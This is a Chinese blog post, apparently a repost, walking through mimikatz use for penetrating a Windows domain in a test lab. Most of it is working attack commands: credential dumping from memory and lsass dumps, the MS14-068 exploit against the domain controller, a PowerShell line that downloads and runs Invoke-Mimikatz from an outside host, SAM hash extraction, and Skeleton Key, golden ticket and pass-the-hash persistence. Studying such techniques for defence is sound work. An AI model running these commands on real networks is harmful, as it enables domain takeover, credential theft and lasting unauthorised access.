• 内网渗透中的mimikatz


    0x00 前言

    上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz

    0x01 简介

    mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

    0x02 测试环境

    网络资源管理模式:

    已有资源:

    域内一台主机权限

    操作系统:win7 x64

    域权限:普通用户

    0x03 测试目标

    1、获得域控权限 2、导出所有用户口令 3、维持域控权限

    0x04 测试过程

    1、获取本机信息

    mimikatz

    privilege::debug

    sekurlsa::logonpasswords

    获取本机用户名、口令、sidLM hashNTLM hash 如图

    2、攻击域控,获得权限

    使用ms14-068漏洞

    ms14-068.exe -u -p -s -d

    生成伪造缓存test.ccache:

    如图导入伪造缓存mimikatz

    kerberos::ptc test.ccache

    登陆:

    net use \A-635ECAEE64804.TEST.LOCAL

    dir \A-635ECAEE64804.TEST.LOCALc$

    获得域控权限,如图

    3、导出域控信息

    1)直接获取内存口令 mimikatz

    privilege::debug

    sekurlsa::logonpasswords

    2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz

    sekurlsa::minidump lsass.dmp

    sekurlsa::logonPasswords full

    3)通过powershell加载mimikatz获取口令

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

    4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEMSAM备份(之前文章有介绍)mimikatz

    lsadump::sam SYSTEM.hiv SAM.hiv

    4、维持域控权限

    1Skeleton Key mimikatz

    privilege::debug

    misc::skeleton

    万能钥匙,可使用任意用户登陆域控

    net use \A-635ECAEE64804.TEST.LOCAL mimikatz /usertest

    如图

    2golden ticket mimikatz

    lsadump::lsa /patch

    获取krbtgtntlmhash,如图

    生成万能票据: mimikatz

    kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi

    导入票据: mimikatz

    kerberos::ptt test.kirbi

    登陆域控:

    net use \A-635ECAEE64804.TEST.LOCAL

    dir \A-635ECAEE64804.TEST.LOCALc$

    如图

    Tips:

    Golden Ticket不多说,自行理解

    By default, the Golden Ticket default lifetime is 10 years

    password changing/smartcard usage does not invalidate Golden Ticket;

    this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;

    NTLM hash of krbtgt account is never changed automatically.

    3Pass-The-Hash mimikatz

    sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

    如图

    5、补充

    登陆域控,刷新扫雷记录,留下名字;D mimikatz

    minesweeper::infos

    如图

    0x05 小结

    本文重点在于介绍mimikatz在内网渗透中的常用方法,其它细节做了适当省略,可在后续详细介绍细节。

  • 相关阅读:
    中断
    按键
    uart stdio的移植1
    串口通信实战
    串口通信相关知识详解
    SOC时钟
    arm-linux-ld: cannot find sdram_init.o
    SDRAM初始化
    代码重定位实战
    s5pv210的启动过程
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154608.html
Copyright © 2020-2023  润新知